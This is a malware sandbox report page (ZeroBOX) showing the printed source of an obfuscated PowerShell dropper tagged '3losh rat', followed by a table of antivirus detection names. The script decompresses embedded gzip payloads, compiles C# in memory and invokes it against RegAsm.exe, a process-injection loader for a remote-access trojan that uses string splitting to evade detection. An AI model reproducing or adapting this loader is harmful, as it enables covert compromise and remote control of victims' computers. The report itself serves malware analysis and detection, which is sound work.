popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
#by code 3losh rat
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName Microsoft.VisualBasic
Add-Type -AssemblyName Microsoft.CSharp
Add-Type -AssemblyName System.Management
[Byte[]] $ALOSH = @(31,139,8,0,0,0,0,0,4,0,237,189,7,96,28,73,150,37,38,47,109,202,123,127,74,245,74,215,224,116,161,8,128,96,19,36,216,144,64,16,236,193,136,205,230,146,236,29,105,71,35,41,171,42,129,202,101,86,101,93,102,22,64,204,237,157,188,247,222,123,239,189,247,222,123,239,189,247,186,59,157,78,39,247,223,255,63,92,102,100,1,108,246,206,74,218,201,158,33,128,170,200,31,63,126,124,31,63,34,214,77,177,188,72,95,95,55,109,190,56,252,141,19,255,207,241,211,34,187,88,86,77,91,76,155,238,87,175,214,203,182,88,228,227,179,101,155,215,213,234,117,94,95,22,211,220,53,251,162,152,214,85,83,157,183,227,159,44,154,117,86,62,201,154,98,74,223,254,198,201,50,91,228,205,42,155,230,233,170,174,126,250,217,87,79,127,227,228,23,255,198,73,74,207,106,61,41,139,105,218,180,25,245,152,78,203,172,105,210,151,199,242,157,54,233,55,107,218,26,253,189,202,47,243,186,201,95,243,95,91,250,33,253,117,199,189,231,129,192,227,94,164,223,210,207,210,143,62,58,12,27,20,203,54,125,158,47,47,218,121,231,11,249,144,94,33,248,99,253,99,5
Function Decompress {
[CmdletBinding()]
Param (
[Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
[byte[]] $byteArray = $(Throw("-byteArray is required"))
Process {
$input = New-Object System.IO.MemoryStream( , $byteArray )
$output = New-Object System.IO.MemoryStream
$gzipStream = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)
$gzipStream.CopyTo( $output )
$gzipStream.Close()
$input.Close()
[byte[]] $byteOutArray = $output.ToArray()
return $byteOutArray
function CodeDom([Byte[]] $BB, [String] $TP, [String] $MT) {
$dictionary = new-object 'System.Collections.Generic.Dictionary[[string],[string]]'
$hello = "Com<><><><><><><".Replace("<><><><><><><","pilerVersion")
$v4 = "v4.0"
$dictionary.Add($hello, $v4)
$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)
$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters
$v1 = "Sys@@@".Replace("@@@","tem.dll")
$CompilerParametres.ReferencedAssemblies.Add($v1)
$CompilerParametres.ReferencedAssemblies.Add("System.!@!$^^%^%**&*&*$$%$%$".Replace("!@!$^^%^%**&*&*$$%$%$","Management.dll"))
$CompilerParametres.ReferencedAssemblies.Add("System.Windows.Forms.dll")
$CompilerParametres.ReferencedAssemblies.Add("mscorlib.dll")
$CompilerParametres.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll")
$CompilerParametres.IncludeDebugInformation = $false
$CompilerParametres.GenerateExecutable = $false
$CompilerParametres.GenerateInMemory = $true
$CompilerParametres.CompilerOptions += "/platform:X86 /unsafe /target:library"
$BB = Decompress($BB)
[System.CodeDom.Compiler.CompilerResults] $CompilerResults = $CsharpCompiler.CompileAssemblyFromSource($CompilerParametres, [System.Text.Encoding]::Default.GetString($BB))
[Type] $T = $CompilerResults.CompiledAssembly.GetType($TP)
[Byte[]] $Bytes = Decompress(@(31,139,8,0,0,0,0,0,4,0,180,189,9,152,100,69,145,56,30,245,170,186,170,186,123,174,158,233,233,238,185,187,167,167,135,102,6,230,158,161,135,115,234,190,239,187,68,160,238,187,94,213,123,85,213,85,133,12,131,162,130,8,136,172,8,120,1,226,174,186,174,138,215,202,138,10,130,162,203,33,224,177,138,140,162,238,226,185,162,187,120,174,43,255,136,124,175,170,171,103,70,100,127,223,247,239,166,227,101,68,102,70,70,70,70,70,68,102,189,26,92,241,183,129,18,0,84,248,247,242,203,0,159,5,233,231,24,252,237,159,19,248,183,106,219,191,172,130,79,13,63,49,243,89,133,243,137,153,96,190,32,78,215,4,62,39,36,42,211,169,68,181,202,55,166,147,153,105,161,89,157,46,84,167,141,158,192,116,133,79,103,246,172,92,57,178,67,230,225,53,1,56,21,74,152,125,219,63,95,214,227,251,60,112,138,81,133,22,224,19,136,140,72,180,143,62,133,96,154,85,74,210,81,153,147,228,6,88,122,194,180,130,209,129,85,31,123,35,192,26,246,223,210,179,255,96,63,65,228,27,145,6,133,151,53,103,154,165,2,86,188,10,93,156,246,131,242,105
$nan = "R"+"e"+"g"+"A"+"s"+"m"+"."+"e"+"x"+"e"
[String] $MyPt = [System.IO.Path]::Combine([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory(),$nan)
[Object[]] $Params=@($MyPt.Replace("F"+"r"+"a"+"m"+"e"+"w"+"or"+"k"+"6"+"4","F"+"r"+"a"+"mew"+"o"+"r"+"k") ,$Bytes)
return $T.GetMethod($MT).Invoke($null, $Params)
} catch { }
[System.Threading.Thread]::Sleep(1000)
$xx = "p"+"r"+"o"+"j"+"F"+"U"+"D"+"."+"P"+"A"
$tata = "E"+"x"+"e"+"c"+"u"+"t"+"e"
CodeDom $ALOSH ($xx) ($tata)
#by code 3losh rat
Antivirus Signature
Bkav Clean
MicroWorld-eScan Clean
FireEye Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Cyren Clean
Symantec Clean
ESET-NOD32 PowerShell/TrojanDropper.Agent.NO
Baidu Clean
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
ClamAV Clean
Kaspersky HEUR:Trojan.PowerShell.Invoker.gen
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Clean
Sophos Clean
Comodo Clean
F-Secure Clean
DrWeb PowerShell.Packed.50
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition PS/Agent.eo
CMC Clean
Emsisoft Clean
Ikarus Trojan-Dropper.PowerShell.Agent
GData Clean
Jiangmin Clean
Avira VBS/Agent.PRG
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Cynet Malicious (score: 99)
AhnLab-V3 Clean
McAfee PS/Agent.eo
MAX Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet PowerShell/Agent.NO!tr
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.